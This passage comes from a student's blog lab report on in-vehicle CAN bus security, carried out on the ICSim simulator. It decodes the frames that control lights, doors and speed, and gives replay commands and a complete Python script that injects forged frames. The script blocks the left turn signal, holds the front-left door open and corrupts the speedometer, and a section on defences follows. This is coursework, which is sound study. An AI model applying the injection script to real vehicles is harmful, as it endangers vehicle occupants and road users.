<ul>
<li><p>关键数据帧：vcan0 02C#0000000E0000 - 左门开</p>
</li>
<li><p>ID：0x02C</p>
</li>
<li><p>第4个字节的低4位</p>
<p>从高到低依次表示后右、后左、前右、前左，0表示开，1表示关</p>
<p><strong>在其他门关闭的前提下</strong>，可得到以下对应，也已经通过cansend重放进行验证</p>
<p>开前左门 00 00 00 0E 00 00</p>
<p>关前左门 00 00 00 0F 00 00</p>
<p>开前右门 00 00 00 0D 00 00</p>
<p>关前右门 00 00 00 0F 00 00</p>
<p>开后左门 00 00 00 0B 00 00</p>
<p>关后左门 00 00 00 0F 00 00</p>
<p>开后右门 00 00 00 07 00 00</p>
<p>关后右门 00 00 00 0F 00 00</p>
<p>全开 	 00 00 00 00 00 00</p>
<p>全关 	 00 00 00 0F 00 00</p>
</li>
</ul>
<p><strong>加速</strong>：利用cansniffer工具使用肉眼观察，重点看与加速同步变化的字节。</p>
<ul>
<li><p>关键数据帧：vcan0 F0#00003894000000（最大速度，第3、4个字节值保持不变）</p>
</li>
<li><p>ID为0xF0</p>
</li>
<li><p>第3、4个字节</p>
</li>
</ul>
<p>不加速时，第3个字节恒为0x01；加速时，值增长变化与速度基本一致（表示当前的速度）。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052235679.jpeg"
                      alt="img"
                > </p>
<p>可以cansend重放检验该数据帧：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import os</span><br><span class="line"></span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">for i in range(10000):</span><br><span class="line"></span><br><span class="line">  os.system(f&quot;cansend vcan0 0F0#00003894000000&quot;)</span><br><span class="line"></span><br><span class="line">  time.sleep(0.01)</span><br></pre></td></tr></table></figure></div>



<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052236896.jpg"
                      alt="img"
                > </p>
<h5 id="3-SavvyCAN使用"><a href="#3-SavvyCAN使用" class="headerlink" title="3. SavvyCAN使用"></a>3. <strong>SavvyCAN使用</strong></h5><h6 id="3-1-SavvyCAN安装"><a href="#3-1-SavvyCAN安装" class="headerlink" title="3.1 SavvyCAN安装"></a><strong>3.1 SavvyCAN安装</strong></h6><blockquote>
<p>参考网络资料，安装SavvyCAN工具。</p>
<p>（安装过程你是否遇到问题？如何解决？）</p>
</blockquote>
<ul>
<li><p>安装Qt</p>
<p>注册账户，下载在线安装程序，安装对应版本5.15.0（我一开始下载的是最新版Qt6，尝试编译时报错，说明版本不兼容，然后更换为Qt5.15.0）</p>
</li>
</ul>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052236013.jpg"
                      alt="img"
                > </p>
<ul>
<li><p>编译：使用Qt5.15.0，然后进行编译。</p>
<p>在等待过程中，我发现有release。下载对应二进制文件尝试建立connection时发现不支持。</p>
</li>
</ul>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052237448.jpeg"
                      alt="img"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052237951.jpg"
                      alt="img"
                > </p>
<p>​		等待编译完成后，可成功运行SavvyCAN。</p>
<h6 id="3-2-SavvyCAN使用"><a href="#3-2-SavvyCAN使用" class="headerlink" title="3.2 SavvyCAN使用"></a><strong>3.2 SavvyCAN使用</strong></h6><blockquote>
<p>使用SavvyCAN，监听你创建的CAN接口，探索SavvyCAN的不同功能，并通过其FUZZ功能筛选灯控、门控、加速的关键数据帧。</p>
<p>（附上实验步骤和关键截图）</p>
</blockquote>
<p>灯控：取消勾选0x2A3时发现转向灯始终关闭，可判断关键帧ID，选定fuzzing字节（第2个），可以确定关键控制字段，分别控制低2位可确定左右灯的控制位。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052237102.jpg"
                      alt="img"
                > </p>
<p>门控：取消勾选0x2C时发现门的状态始终不变，可判断关键帧ID，选定fuzzing字节（第4个），可以确定关键控制字段，分别控制低4位可确定四扇门的控制位。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052230379.jpg"
                      alt="img"
                > </p>
<p>加速：取消勾选0xF0时发现速度始终不变，可判断关键帧ID，选定fuzzing字节（第3、4个），可以发现主要与第3个字节有关，其增长变化与速度变化基本一致。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052238122.jpg"
                      alt="img"
                > </p>
<h6 id="3-3-关键帧总结"><a href="#3-3-关键帧总结" class="headerlink" title="3.3 关键帧总结"></a><strong>3.3 关键帧总结</strong></h6><blockquote>
<p>列出你所得到的与灯控、门控、加速有关的关键帧详细信息（报文ID 数据长度 关键控制字段在哪一个或多个字节）。</p>
</blockquote>
<table>
<thead>
<tr>
<th>功能</th>
<th>报文ID</th>
<th>数据长度&#x2F;byte</th>
<th>关键控制字段</th>
<th>详细</th>
</tr>
</thead>
<tbody><tr>
<td>灯控</td>
<td>0x2A3</td>
<td>4</td>
<td>第2个字节低2位</td>
<td>从低到高依次表示左灯、右灯，0表示不亮</td>
</tr>
<tr>
<td>门控</td>
<td>0x2C</td>
<td>6</td>
<td>第4个字节低4位</td>
<td>从高到低依次表示后右、后左、前右、前左，0表示开门</td>
</tr>
<tr>
<td>加速</td>
<td>0xF0</td>
<td>7</td>
<td>第3、4个字节</td>
<td>第3个字节的值变化与速度变化一致</td>
</tr>
</tbody></table>
<h4 id="（三）进阶实验"><a href="#（三）进阶实验" class="headerlink" title="（三）进阶实验"></a>（三）<strong>进阶实验</strong></h4><h5 id="1-关键帧分析"><a href="#1-关键帧分析" class="headerlink" title="1. 关键帧分析"></a>1. <strong>关键帧分析</strong></h5><blockquote>
<p>以你的<strong>个人学号</strong>为种子，在<strong>难度2</strong>下重新启动ICSim模拟器，使用SavvyCAN，找到当前模拟条件下与灯控、门控、加速有关的关键帧详细信息。</p>
<p>(附上主要步骤、截图和关键帧总结，以及描述你在更高的难度下遇到哪些困难。）</p>
</blockquote>
<p>学号为xxx，用完整学号作为种子后，模拟器部分功能异常，因此这里去掉了最高位，即“.&#x2F;controls -s xx -l 2 vcan0”。</p>
<p><strong>灯控</strong>：ID为0x211，第1个字节，低2位从低到高分别控制左灯、右灯，1为开，0为关。与之前不同的是，其他字节的值一直在发生变化。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052239419.jpg"
                      alt="img"
                > </p>
<p><strong>门控</strong>：ID为0x781，第6个字节，低4位从高到低依次控制后右、后左、前右、前左，0为开，1为关。与之前不同的是，每次进行开关门操作时其他字节会发生随机变化，所以直接看该数据帧的值时会发现相同的操作对应不同的值，很难发现规律。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052230282.jpg"
                      alt="img"
                > </p>
<p><strong>加速</strong>：ID为0x579，第4、5个字节，第4个字节的值变化与速度变化基本一致（表示当前的速度），达到最大速度时，第4、5个字节的值保持不变。与之前不同的是，在速度变化的过程中其他字节也会发生随机变化，所以直接看该数据帧的值很难发现规律，容易眼花缭乱。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052240510.jpg"
                      alt="img"
                > </p>
<table>
<thead>
<tr>
<th>功能</th>
<th>报文ID</th>
<th>数据长度&#x2F;字节</th>
<th>关键控制字段</th>
<th>详细</th>
</tr>
</thead>
<tbody><tr>
<td>灯控</td>
<td>0x211</td>
<td>7</td>
<td>第1个字节低2位</td>
<td>从低到高以此表示左灯、右灯，0表示不亮</td>
</tr>
<tr>
<td>门控</td>
<td>0x781</td>
<td>7</td>
<td>第6个字节低4位</td>
<td>从高到低依次表示后右、后左、前右、前左，0表示开门</td>
</tr>
<tr>
<td>加速</td>
<td>0x579</td>
<td>7</td>
<td>第4、5个字节</td>
<td>第4个字节的值变化与速度变化一致</td>
</tr>
</tbody></table>
<h5 id="2-攻击模拟"><a href="#2-攻击模拟" class="headerlink" title="2. 攻击模拟"></a>2. <strong>攻击模拟</strong></h5><h6 id="重放攻击"><a href="#重放攻击" class="headerlink" title="重放攻击"></a>重放攻击</h6><blockquote>
<p>重放你之前分析所得到的关键单帧以及在某一段操作时间内用candump捕获到的所有数据帧日志，观察是否能够控制某些关键功能（灯控、加速、门控）。</p>
<p>(附上主要步骤截图）</p>
</blockquote>
<p><strong>灯控</strong>：重放211#0100B400000000，可以控制转向灯。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052240825.jpg"
                      alt="img"
                > </p>
<p><strong>加速</strong>：捕获了一段加速的数据帧日志，使用canplayer进行重放，可以实现加速。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052240677.jpg"
                      alt="img"
                > </p>
<p><strong>门控</strong>：重放781#D10000D7640ED5，可以打开前左门。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052230316.jpg"
                      alt="img"
                > </p>
<h6 id="DoS攻击"><a href="#DoS攻击" class="headerlink" title="DoS攻击"></a>DoS攻击</h6><blockquote>
<p>用你自己的方式，对灯控、加速、门控服务实施DoS攻击，具体表现分别为</p>
<ol>
<li><p>左转向灯无法正常亮起、右转向灯可正常控制。</p>
</li>
<li><p>仪表盘失灵，加速时无法正确显示当前速度。</p>
</li>
<li><p>左前门无法正常关闭，其余车门可正常控制。</p>
</li>
</ol>
<p>(附上主要攻击步骤、工具截图或攻击代码)</p>
</blockquote>
<p><strong>攻击思路</strong>：持续监听数据帧，当监听到相关操作数据帧时（ID&#x3D;0x211、0x781、0x579），进行对应操作。</p>
<p>0x211（灯控）：检查数据帧数据，第1个字节为1或3，说明用户想开启左灯，此时攻击程序发送一个关闭左灯的数据帧，该帧保证右灯控制位与监听到的数据帧一致（程序实现就是对1、3两种情况分别讨论了一下）。</p>
<p>0x579（加速）：当第4个字节的值大于0x01时，说明用户想要加速，此时攻击程序发送该ID第4个字节内容为随机值的数据帧，使得仪表盘速度显示为随机值。</p>
<p>0x781（门控）：将第6个字节与0x01进行与运算，若结果为1，说明当前用户想关闭左前门，此时攻击程序发送第6个字节与0xFE进行与操作的数据帧，确保左前门保持打开状态、其他车门操作正常。（无论左前门的初始状态如何，程序执行过程中会一直保持左前门的打开状态，其他车门可正常操作）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202511052241146.jpg"
                      alt="img"
                ></p>
<p><strong>完整代码如下</strong>：</p>
<div class="highlight-container" data-rel="C++"><figure class="iseeu highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">import</span> can</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="keyword">import</span> time</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="keyword">import</span> random</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"> </span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">def <span class="title">attack</span><span class="params">()</span>:</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">  bus =</span> can.interface.<span class="built_in">Bus</span>(channel=<span class="string">&#x27;vcan0&#x27;</span>, interface=<span class="string">&#x27;socketcan&#x27;</span>)</span><br><span class="line"></span><br><span class="line">  <span class="keyword">while</span> True:</span><br><span class="line"></span><br><span class="line">​    message = bus.<span class="built_in">recv</span>(timeout=<span class="number">1.0</span>)</span><br><span class="line"></span><br><span class="line">​    data = <span class="built_in">list</span>(message.data)</span><br><span class="line"></span><br><span class="line">​    <span class="keyword">if</span> message is None:</span><br><span class="line"></span><br><span class="line">​      <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">​    <span class="keyword">if</span> message.arbitration_id == <span class="number">0x211</span> :</span><br><span class="line"></span><br><span class="line">​      <span class="keyword">if</span> data[<span class="number">0</span>] == <span class="number">0x01</span>:</span><br><span class="line"></span><br><span class="line">​        <span class="built_in">print</span>(f<span class="string">&quot;用户想开启左灯……&quot;</span>)</span><br><span class="line"></span><br><span class="line">​        attack_m = can.<span class="built_in">Message</span>(</span><br><span class="line"></span><br><span class="line">​          arbitration_id=<span class="number">0x211</span>,</span><br><span class="line"></span><br><span class="line">​          data=[<span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>],</span><br><span class="line"></span><br><span class="line">​          is_extended_id=False</span><br><span class="line"></span><br><span class="line">​        )</span><br><span class="line"></span><br><span class="line">​        bus.<span class="built_in">send</span>(attack_m)</span><br><span class="line"></span><br><span class="line">​      elif data[<span class="number">0</span>] == <span class="number">0x03</span>:</span><br><span class="line"></span><br><span class="line">​        <span class="built_in">print</span>(<span class="string">&quot;用户想开启左灯和右灯……&quot;</span>)</span><br><span class="line"></span><br><span class="line">​        attack_m = can.<span class="built_in">Message</span>(</span><br><span class="line"></span><br><span class="line">​          arbitration_id=<span class="number">0x211</span>,</span><br><span class="line"></span><br><span class="line">​          data=[<span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>],</span><br><span class="line"></span><br><span class="line">​          is_extended_id=False</span><br><span class="line"></span><br><span class="line">​        )</span><br><span class="line"></span><br><span class="line">​        bus.<span class="built_in">send</span>(attack_m)</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">​    <span class="keyword">if</span> message.arbitration_id == <span class="number">0x781</span> <span class="keyword">and</span> data[<span class="number">5</span>] &amp; <span class="number">0x01</span>:   # 左前门将一直保持打开状态</span><br><span class="line"></span><br><span class="line">​      <span class="built_in">print</span>(<span class="string">&quot;用户想关闭左前门……&quot;</span>)</span><br><span class="line"></span><br><span class="line">​      d = data</span><br><span class="line"></span><br><span class="line">​      d[<span class="number">5</span>] &amp;= <span class="number">0xFE</span></span><br><span class="line"></span><br><span class="line">​      attack_m = can.<span class="built_in">Message</span>(</span><br><span class="line"></span><br><span class="line">​        arbitration_id=<span class="number">0x781</span>,</span><br><span class="line"></span><br><span class="line">​        data=d,</span><br><span class="line"></span><br><span class="line">​        is_extended_id=False</span><br><span class="line"></span><br><span class="line">​      )</span><br><span class="line"></span><br><span class="line">​      bus.<span class="built_in">send</span>(attack_m)</span><br><span class="line"></span><br><span class="line">​      </span><br><span class="line"></span><br><span class="line">​    <span class="keyword">if</span> message.arbitration_id == <span class="number">0x579</span> <span class="keyword">and</span> data[<span class="number">3</span>] &gt; <span class="number">0x01</span>:</span><br><span class="line"></span><br><span class="line">​      <span class="built_in">print</span>(<span class="string">&quot;用户想加速……&quot;</span>)</span><br><span class="line"></span><br><span class="line">​      d = data</span><br><span class="line"></span><br><span class="line">​      d[<span class="number">3</span>] = random.<span class="built_in">randint</span>(<span class="number">0</span>, <span class="number">255</span>)</span><br><span class="line"></span><br><span class="line">​      attack_m = can.<span class="built_in">Message</span>(</span><br><span class="line"></span><br><span class="line">​        arbitration_id=<span class="number">0x579</span>,</span><br><span class="line"></span><br><span class="line">​        data=d,</span><br><span class="line"></span><br><span class="line">​        is_extended_id=False</span><br><span class="line"></span><br><span class="line">​      )</span><br><span class="line"></span><br><span class="line">​      bus.<span class="built_in">send</span>(attack_m)</span><br><span class="line"></span><br><span class="line"><span class="built_in">attack</span>()</span><br></pre></td></tr></table></figure></div>



<h2 id="三．实验总结"><a href="#三．实验总结" class="headerlink" title="三．实验总结"></a>三．<strong>实验总结</strong></h2><ol>
<li>CAN总线通信与其他网络通信协议相比，有哪些脆弱性？这导致了CAN易受哪些攻击？</li>
</ol>
<ul>
<li><p>缺乏身份验证机制和消息完整性校验，任何连接到总线的设备都可以发送数据帧，攻击者可实现注入、篡改、阻断关键控制信息等攻击。</p>
</li>
<li><p>通信数据未加密，攻击者可监听、分析关键操作帧，如灯控、门控、加速等操作的关键帧，从而达到特定的攻击目的。</p>
</li>
<li><p>广播通信机制使得单点攻击可能影响整个系统。</p>
</li>
<li><p>滥用优先级仲裁机制。不断发送高优先级的无效帧可实现DoS攻击，导致通信无法正常运行。</p>
</li>
</ul>
<p>CAN总线通信易受到重放攻击、DoS攻击、命令注入、设备欺骗、数据帧篡改等攻击。</p>
<ol start="2">
<li>对于CAN总线而言，除一般的欺骗、注入、重放、DoS类攻击之外，还有哪些可能存在的攻击思路？（可以根据你对CAN总线通信的理解进行创新，或者从其他通信协议的各种攻击面进行迁移）</li>
</ol>
<p>不同ID对应的数据帧有自己固定的格式，如数据长度、控制位等，攻击者可以故意发送错误格式的数据帧，接收端要么会读取混乱（如数据越界导致崩溃），要么执行这个错误指令，导致设备关键操作陷入混乱，实现攻击目的。</p>
<ol start="3">
<li>有哪些防御手段可以增强车内CAN总线通信的安全性？</li>
</ol>
<ul>
<li><p>引入认证机制，可在数据帧中附加数字签名，用于验证帧的来源与完整性，防止伪造和篡改。</p>
</li>
<li><p>在数据帧接收端设置白名单和正则匹配来限制数据帧接受来源，保证帧的格式正确，避免非法注入和重放。</p>
</li>
<li><p>将关键控制系统与非关键系统分离，防止单点攻击影响整个系统（如利用非关键系统漏洞攻击关键系统等）。</p>
</li>
<li><p>监测帧频率异常、ID异常等行为，以识别DoS、重放等攻击，必要时采取拦截手段。</p>
</li>
</ul>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 竞学实训（4）</li>
        <li><strong>Author:</strong> dawn_r1sing</li>
        <li><strong>Created at
                :</strong> 2025-07-13 22:42:57</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2025-11-08 11:43:54
            </li>
        
        <li>
            <strong>Link:</strong> https://dawnrisingdong.github.io/2025/07/13/竞学实训（4）/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/%E5%AE%9E%E9%AA%8C/">#实验</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/%E8%AF%BE%E5%86%85%E5%AD%A6%E4%B9%A0/">#课内学习</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2025/09/05/2308-jailbreak/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">2308: jailbreak</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2025/07/11/%E7%AB%9E%E5%AD%A6%E5%AE%9E%E8%AE%AD%EF%BC%883%EF%BC%89/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">竞学实训（3）</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">竞学实训（4）</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C-CAN-Security"><span class="nav-text">实验 CAN Security</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%EF%BC%8E%E5%AE%9E%E9%AA%8C%E7%9B%AE%E7%9A%84"><span class="nav-text">一．实验目的</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%EF%BC%8E%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9"><span class="nav-text">二．实验内容</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%EF%BC%8E%E5%AE%9E%E9%AA%8C%E6%80%BB%E7%BB%93"><span class="nav-text">三．实验总结</span></a></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2023</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">dawn_r1sing</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        33 posts in total
                    </span>
                    
                        <span>
                            65k words in total
                        </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.2</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
